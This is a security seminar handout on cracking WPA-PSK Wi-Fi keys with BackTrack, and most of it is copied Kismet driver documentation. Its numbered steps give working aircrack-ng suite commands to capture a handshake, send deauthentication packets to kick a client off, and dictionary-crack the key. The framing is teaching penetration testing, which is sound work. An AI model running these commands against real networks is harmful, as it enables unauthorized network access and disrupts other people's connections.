Wireless Penetration Testing: Cracking WPA-PSK
Security Seminar by:

       Edward Brian Drumheller Jr.

          Joseph Allan Krug Esquire

          Justin Thomas Lewis


Preparation

For this Seminar we are using a bootable Linux Cd-rom Distribution, BackTrack 3 Beta - 14-12-2007. This is a fully operational operating system that boots from a cd. In order to go forth with this Seminar you will need a CD-R drive and a CD-R or CD-rw disc in which to burn the image file to. You can go to http://www.remote-exploit.org/backtrack_download.html to find the image file from various different mirror websites. Once you obtain the image (the file is 700mb so it can take a while to download), burn it to a cd. If you do not have any programs that allow you to do this, download a program like this one  http://cdburnerxp.se/

 

Once finished, shut your computer down, and restart. You may need to go into your BIOS in order to change the default boot order so that a CD-rom will boot before your hard drive. Pay attention when your system first boots up, there should be a selection for the BIOS often called "setup". Inside find where you can switch the boot order, commonly under "boot". Save settings and exit.

 

Your system should now restart.

 

If prompted, press any key to boot to the live disc.

 

when asked, booted in the KDE option.

 

Once the desktop loads follow these directions...

 

Open up a Terminal Windows and run command “wget http://eddrumheller.com/pen/word.lst” This file will be downloaded to your home directory and used later

 

 

Cracking WPA-PSK

 

1.     Open up a Terminal Windows and run command “iwconfig”

2.     Write down the interface that has wireless extensions

3.     Make sure the mode of the card is set to Monitor

a.     If mode is set to Managed, run the command “iwconfig wirelessAdapter mode monitor”

 

4.     Open the conf file by running the command vi /usr/local/etc/kismet.conf



Change line 27 "# source=none,none,addme" to "sources=<kismetDriver>,<wirelessAdapter>,<wireless>"



Run kismet by running the command "kismet" in the Terminal. Code will be produced, and a GUI interface will display inside of the menu.

a.     Press h to view the help menu

b.     Press x to close any pop-up menu

c.      Press s to bring up sort menu

d.     Press b to sort by BSSID

e.     Highlight Name “dd-wrt”

f.       Press Enter to view information

g.     Write down BSSID and Channel Number.

h.     Close the kismet terminal window (Mandatory)



 

 

5.     Open up a new terminal and type the command “airodump-ng -c <channel of AP> --bssid <AP's bssid> -w capture eth0

a.     Leave this window open, this program will be intercepting the handshake.

6.      “Open up another terminal and type  aireplay-ng -0 5 -a <AP's bssid> -c <client's bssid> eth0 to issue a de-auth packet to the client’s machine who is already authenticated

7.     View the Aireplay and Airodump terminals side by side. If the injection worked, WPA Handshake <BSSID> will be displayed in the upper right hand corner of Airodump.

a.     The capture of the handshake is now stored in your home directory

 

8.     crack the handshake with aircrack using the command

aircrack-ng -w <location of a dictionary file> -b <AP's bssid> capture*.cap

Note: the key will be displayed once it is found.


 

Directions to connect to an AP secured with WPA in BackTrack2

To connect to WPA, there is a little bit of work needed:

 

* The creating of a conf file

* Running the script

 

Creating the .conf file:

 

            open your favourite editor and add the following code

 

            network={

            ssid="youraccesspointname"

            psk="youraccesspointspassword"

            }

 

Save this in /root as wpa.conf

 

Running the script:

 

First run this command

wpa_supplicant -i eth0 (change to your adaptor) -c wpa.conf

 

-i = specifies what interface to use

-c = specifies the location of the .conf file

 

This should bring up a message that states that the connection has been successful.

It is important not to close this shell

 

then open another shell and type

 

dhcpcd eth0 (change to your adaptor)

 

Test the connection.

 


KISMET Documentation

 

12. Capture Sources

   

    A capture source in Kismet is anything which provides packets to the Kismet

    engine.  Capture sources define the underlying engine needed to capture

    data from the interface, how to change channel, and how to enter rfmon

    mode.  It is necessary to tell Kismet what specific type of card you use

    because different drivers often use different methods to report information

    and enter monitor mode.

 

    Source type     Cards               OS          Driver

    --------------- ------------------- ----------- -------------------------

    acx100          TI ACX100           Linux       ACX100

                    http://acx100.sourceforge.net/

                    ACX100 drivers handle the 22mbit cards branded by D-Link

                     and others.

 

    admtek          ADMTek              Linux       ADMTek

                    http://www.latinsud.com/adm8211/        (Patches)

                    http://aluminum.sourmilk.net/adm8211/   (GPL driver)

                    ADMTek drivers used in many consumer 802.11b cards. With

                     the patches above, quasi-rfmon is possible - these cards

                     appear to be almost entirely software controlled and

                     always in a rfmon-like state.  This card WILL BROADCAST

                     while in rfmon, rendering the sniffer visible.

                    The fully GPL drivers are supported, in addition to the

                     hacks to the non-free drivers.

 

    airpcap         Airpcap USB         cygwin      CACE Tech

                    http://www.cacetech.com/products/airpcap.htm

                    The CACE AirPcap USB device allows native capture on

                     Win32/Cygwin.

                    The explicit airpcap source expects the Win32/Cygwin

                     interface name.  This should be used once the source

                     is identified via airpcap_ask or if multiple simultaneous

                     sources are required.

 

    airpcap_ask     Airpcap USB         cygwin      CACE Tech

                    http://www.cacetech.com/products/airpcap.htm

                    The CACE AirPcap USB device allows native capture on

                     Win32/Cygwin.

                    The airpcap_ask source lists available airpcap devices

                     and allows the user to pick interactively.

                    The 'capture interface' field is irrelevant and can be

                     filled with any value (for example, 'dummy')

 

    atmel_usb       Atmel-USB           Linux       Berlios-Atmel

                    http://at76c503a.berlios.de/

                    These drivers work ONLY on USB cards (Sorry, no PCMCIA

                     support).  Monitor mode support is limited and "faked"

                     by bypassing part of the firmware and parsing packets

                     directly, and is likely to not report all of the

                     frames.

                    This card MAY BROADCAST while in rfmon, rendering the

                     sniffer visible.

                    It appears that this card may be only formatting the

                     beacons as an 802.11 stream, which means you likely

                     will not see data frames, rendering most IDS functions,

                     IP discovery, and data logging unavailable.

 

    ath5k           Atheros             Linux       Kernel/Madwifi

                    http://madwifi.org

                    Based on the OpenBSD OpenHAL, the Ath5k drivers are the

                     future of Atheros support and will be mainlined into the

                     Linux kernel.

 

    ath5k_a         Atheros             Linux       Kernel/Madwifi

                    http://madwifi.org

                    Ath5k source for 11a only

 

    ath5k_ag        Atheros             Linux       Kernel/Madwifi

                    http://madwifi.org

                    Ath5k source for 11a/11g

 

    bcm43xx         Broadcom            Linux       BCM43XX

                    http://bcm43xx.berlios.de, kernel

                    Linux native broadcom drivers incorporated into modern

                     kernels.

 

    b43             Broadcom            Linux

                    B43 broadcom drivers for current Broadcom devices in

                     Linux kernels

 

    b43legacy       Broadcom            Linux

                    B43 broadcom drivers for legacy Broadcom devices in

                     Linux kernels

 

    cisco           Aironet 340,350     Linux       Kernel 2.4.10 - 2.4.19

                    Standard Cisco cards in Linux.  Works only with

                     the Linux kernel drivers, not the drivers found in

                     pcmcia-cs.

                    The drivers found on the cisco.com site can be patched

                     with the files from the Kismet download site to add

                     monitor mode with channel control, HOWEVER these drivers

                     are extremely buggy for normal use and work only with

                     the 2.4 kernel tree.

                    The cisco drivers currently do not enter rfmon mode

                     correctly, so channel control is not available.  The

                     firmware will hop to whatever channel it feels like

                     hopping to, when it feels like hopping.

 

    cisco_wifix     Aironet 340,350     Linux       Kernel 2.4.20+, CVS 

                    http://sourceforge.net/projects/airo-linux/ 

                    Capture interface:  'ethX:wifiX'

                    Kernel 2.4.20+ and CVS drivers use ethX for normal mode

                     and wifiX for monitor mode.  Kismet needs to know both

                     devices, which may not necessarily be the same number,

                     for example 'eth1:wifi0'.

                    Linux kernel 2.4.20 and 2.4.21 have highly unstable cisco

                     drivers and should be avoided.

                    The cisco drivers currently do not enter rfmon mode

                     correctly, so channel control is not available.  The

                     firmware will hop to whatever channel it feels like

                     hopping to, when it feels like hopping.

 

    darwin          OSX native cards    OSX/Darwin  OSX

                    Supports both Broadcom and Atheros Airport-Extreme cards.

                    When using a Broadcom based card, it may be necessary to

                     enable rfmon on the device for the first time using another

                     program.

                    When using an Atheros based card, 802.11a may also be supported

                     by adding a 'sourcechannels' line to kismet.conf.

 

    hostap          Prism/2             Linux       HostAP 0.4

                    http://hostap.epitest.fi/

                    HostAP drivers drive the Prism/2 chipset in access point

                     mode, but also can drive the cards in client and monitor

                     modes.  The HostAP drivers seem to change how they go

                     into monitor mode fairly often, but this source should

                     manage to get them going.

 

    ipw2100         Intel/Centrino      Linux       ipw2100-0.44+

                    http://ipw2100.sourceforge.net/

                    The Linux IPW2100/Centrino drivers for 802.11b cards

                    now support rfmon, so here's support for them.  They act

                    more or less like any other wireless interface would.

 

    ipw2200         Intel/Centrino      Linux       ipw2200-1.0.4+

                    http://ipw2200.sourceforge.net/

                    The Linux IPW2200/Centrino drivers for 802.11bg cards

                    support rfmon as of 1.0.4 and firmware 2.3. 

                    Signal level reporting requires radiotap be turned on

                    in the makefile while compiling the driver.  Noise levels

                    are not reported.

 

    ipw2915         Intel/Centrino      Linux       ipw2200-1.0.4+

                    http://ipw2200.sourceforge.net/

                    The Linux IPW2200/Centrino drivers for 802.11bga cards

                    support rfmon as of 1.0.4 and firmware 2.3. 

                    This is the same as ipw2200 but defaults to scanning the

                    802.11a channel range in addition to 802.11b/g.

                    Signal level reporting requires radiotap be turned on

                    in the makefile while compiling the driver.  Noise levels

                    are not reported.

 

    ipw3945         Intel/Centrino      Linux       ipw3945

                    http://ipw3945.sourceforge.net/

                    The Linux IPW3945/Centrino drivers for Intel Core

                    802.11bga cards.

 

    ipwlivetap      Intel/Centrino      Linux       ipw2200/3945

                    http://ipw2200.sourceforge.net/

                    http://ipw3945.sourceforge.net/

                    The ipw3945 and patched ipw2200 drivers support a

                    special mode which allows monitor-mode style sniffing

                    while remaining associated.  Channel hopping is not

                    possible, as the card is still associated to a

                    specific AP, but single-channel IDS and sniffing can

                    be accomplished.  See the ipw driver mailing list

                    archives for information about patching your drivers.

 

    iwl3945         Intel/Centrino      Linux       iwl3945

                    Intel's new IPW drivers using the mac80211 kernel

                    layer.

 

    iwl4965         Intel/Centrino      Linux       iwl4965

                    Intel's new IPW drivers using the mac80211 kernel

                    layer.

 

    kismet_drone    n/a                 Any         n/a

                    Capture interface:  'dronehost:port' 

                    The remote drone capture source connects to a Kismet

                     drone and processes the packets.  Refer to the Remote

                     Drone section of the README for more details about how

                     to set up a drone.

 

    madwifi_a       Atheros             Linux       madwifi

                    http://sourceforge.net/projects/madwifi/

                    Capture interface:  'athX'

                    Capture interface:  'wifiX' (Madwifi-NG)

                    Madwifi drivers in 802.11a-only mode.

                    When using madwifi-ng, be sure all non-monitor VAPs have

                     been removed, otherwise madwifi will not properly report

                     most traffic.

 

    madwifi_b       Atheros             Linux       madwifi

                    http://sourceforge.net/projects/madwifi/

                    Capture interface:  'athX'

                    Capture interface:  'wifiX' (Madwifi-NG)

                    Madwifi drivers in 802.11b-only mode.

                    When using madwifi-ng, be sure all non-monitor VAPs have

                     been removed, otherwise madwifi will not properly report

                     most traffic.

 

    madwifi_g       Atheros             Linux       madwifi

                    http://sourceforge.net/projects/madwifi/

                    Capture interface:  'athX'

                    Capture interface:  'wifiX' (Madwifi-NG)

                    Madwifi drivers in 802.11g-only mode.  This will,

                     obviously, also see 11b networks.

                    When using madwifi-ng, be sure all non-monitor VAPs have

                     been removed, otherwise madwifi will not properly report

                     most traffic.

 

    madwifi_ab      Atheros             Linux       madwifi

                    http://sourceforge.net/projects/madwifi/

                    Capture interface:  'athX'

                    Capture interface:  'wifiX' (Madwifi-NG)

                    Madwifi drivers in 802.11a and 802.11b combo mode.  This

                     will seamlessly switch between bands during channel

                     hopping.

                    When using madwifi-ng, be sure all non-monitor VAPs have

                     been removed, otherwise madwifi will not properly report

                     most traffic.

 

    madwifi_ag      Atheros             Linux       madwifi

                    http://sourceforge.net/projects/madwifi/

                    Capture interface:  'athX'

                    Capture interface:  'wifiX' (Madwifi-NG)

                    Madwifi drivers in 802.11a and 802.11g combo mode.  This

                     will seamlessly switch between bands during channel

                     hopping.

                    When using madwifi-ng, be sure all non-monitor VAPs have

                     been removed, otherwise madwifi will not properly report

                     most traffic.

 

    madwifing_a     Atheros             Linux       madwifi-ng

    madwifing_ab    Atheros             Linux       madwifi-ng

    madwifing_ag    Atheros             Linux       madwifi-ng

    madwifing_g     Atheros             Linux       madwifi-ng

    madwifing_b     Atheros             Linux       madwifi-ng

                    http://sourceforge.net/projects/madwifi/

                    Capture interface:  'wifiX'

                    *Deprecated*.  Detection for madwifi-ng is built into

                     the standard madwifi sources.  The _ng source names

                     have been kept to allow old configs to continue

                     functioning.

 

    nokia770        Nokia/TI            Linux       Nokies/TI

                    http://maemo.org/

                    Nokia770 capture interface.  Includes support for

                    validating frame checksums to screen out junk

                    packets, since the drivers pass us all data.

 

    orinoco         Lucent, Orinoco     Linux       Patched orinoco_cs

                    http://airsnort.shmoo.com/orinocoinfo.html

                    The Orinoco drivers which have mainlined into the Linux

                     kernel do support monitor mode, however only specific firmware

                     versions are supported and often they do not work.

                    An up-ported version of the older Orinoco drivers which more

                     reliably supported rfmon may be available at:

                     http://www.projectiwear.org/~plasmahh/orinoco.html

                    Generally, Orinoco cards are not recommended for use with

                     Kismet due to these limitations.

 

    orinoco_14      Lucent, Orinoco     Linux       Orinoco 0.14+

                    https://savannah.nongnu.org/projects/orinoco/

                    This source is deprecated and should only be used with

                    pre-release versions of a driver since merged into the Linux

                    kernel.

 

    pcapfile        n/a                 Any         n/a

                    Capture interface:  '/path/to/file'

                    The pcapfile capture source feeds a stored 802.11-encap

                     dump file through the Kismet engine again.  This can be

                     useful for debugging or rescanning old logs for

                     alert conditions.  Pcapfile sources are only available

                     if Kismet was compiled with libpcap support.

 

    prism2_openbsd  Prism/2             OpenBSD     Kernel

                    Full support for Prism2 under OpenBSD.

 

    prism54g        PrismGT             Linux       prism54

                    http://www.prism54.org

                    PrismGT 802.11g drivers supporting monitor mode.

 

    radiotap_bsd_ab Radiotap            BSD         Kernel

                    Dual-band cards with radiotap headers.

 

    radiotap_bsd_a Radiotap              BSD        Kernel

                    802.11a cards (or dual-band on 11a channels only) with

                     radiotap headers.

 

    radiotap_bsd_b Radiotap             BSD         Kernel

                    802.11b/g cards (or dual-band on 11b channels only) with

                     radiotap headers.

 

    rt2400          Ralink 2400 11b     Linux       rt2400-gpl

                    http://rt2x00.serialmonkey.com/

                    Ralink 2400 802.11b cards using the serialmonkey GPL'd

                     rt2x00 drivers.  Must use 1.2.2 beta 2 or newer drivers.

 

    rt2500          Ralink 2500 11g     Linux       rt2500-gpl

                    http://rt2x00.serialmonkey.com/

                    Ralink 2500 802.11g cards using the serialmonkey GPL'd

                     rt2x00 drivers.  Must use 1.1.0 beta 2 or newer drivers.

 

    rt73            Ralink 73   11g     Linux       rt73-gpl-cvs

                    http://rt2x00.serialmonkey.com/

                    Ralink 73 802.11g USB cards using the serialmonkey GPL'd

                     rt79 drivers (tested only with CVS driver versions)

 

    rt8180          Realtek 8180 11b    Linux       rtl8180-sa2400

                    http://rtl8180-sa2400.sourceforge.net/

                    Realtek 8180 based cards (there seem to be an awful lot of

                     them) using the GPL drivers.

 

    viha            Airport             OSX         viha

                    http://www.dopesquad.net/security/

                    Monitor mode support for Airport under OSX.  Does not

                     support Airport Extreme.

 

    vtar5k          Atheros 802.11a     Linux       vtar5k

                    http://team.vantronix.net/ar5k/

                    vtar5k drivers handle some Atheros 802.11a cards.  Chances

                     are you'll have better luck with madwifi drivers.

 

    wlanng_legacy   Prism/2             Linux       wlan-ng 0.1.3 and earlier

                    http://www.linux-wlan.com/

                    Old wlan-ng drivers didn't support pcap capturing and

                     use a netlink socket to the kernel.  These are still in

                     use on some embedded systems (like the Zaurus).

 

    wlanng          Prism/2             Linux       wlan-ng 0.1.4 - 0.1.9

                    http://www.linux-wlan.com/

                    Wlan-ng prism2 drivers prior to the AVS headers.

 

    wlanng_avs      Prism/2             Linux       wlan-ng 0.2.0+

                    http://www.linux-wlan.com/

                    Newer wlan-ng drivers support a new header type and

                     slightly different monitor commands to report wepped

                     packets.

 

    wrt54g          Linksys WRT54G      Linux       linksys

                    http://seattlewireless.net/index.cgi/LinksysWrt54g 

                    Capture interface:  'ethX'

                    Capture interface:  'ethX:prismX'

                    Support for the drivers found in the embedded Linux

                     inside the Linksys WRT54G (and probably other APs using

                     the same firmware).

                    Newer firmwares (such as OpenWRT) use the prism0 device

                     for monitor mode data.  On these firmwares, specify both

                     interfaces (wrt54g,eth1:prism0,foo)

 

    wsp100          NetChem WSP100      Any         n/a

                    http://networkchemistry.com/

                    Capture interface:  'host:port'

                    The WSP100 is an embedded device which reports 802.11

                     packets over UDP.  The wsp100 capture source is

                     (generally) system agnostic, however over time it has

                     been less maintained than others.  If you'd like to

                     send me patches for this, please let me know.

 

    zd1211          ZyDAS USB           Linux       zd1211

                    http://zd1211.ath.cx

                    The ZD1211 drivers have had some regressions which lead to

                     data corruption while changing channel.  Some versions

                     work, and typically the aircrack patches resolve the

                     corruption issues if your version doesn't properly handle

                     rfmon.

 

    Chipsets known to NOT WORK:

     Broadcom           - No linux drivers, only useable with ndiswrapper or

                          linuxant wrappers around windows drivers.

                          *** UPDATE ***

                          See the bcm43xx source type entry.  There are

                          experimental reverse-engineered drivers which have

                          monitor mode support now under Linux!  If they don't

                          work, however, then too bad.

     Airport Extreme    - Really a Broadcom, with no rfmon in the OSX drivers.

                          *** UPDATE ***

                          See the bcm source for linux on ppc, it MAY work, it

                          may not.  Currently theres no solution for OSX but

                          I'm looking for OSX hackers interested in redoing the

                          Kismet port and looking into adding more support.

     Atmel              - There is a hack for pseudo-monitor in USB.  There is

                          currently no equivalent hack for PCMCIA.

     HermesII           - Proxim successor to the Orinoco/HermesI.  No support

                          yet in the drivers, may be available in the future.

     ndiswrapper        - Anything using ndiswrapper is using WINDOWS drivers

                          AND CAN NOT BE USED WITH KISMET.


More Detailed Information about Kismet, visit kismetwireless.net/documentation.shtml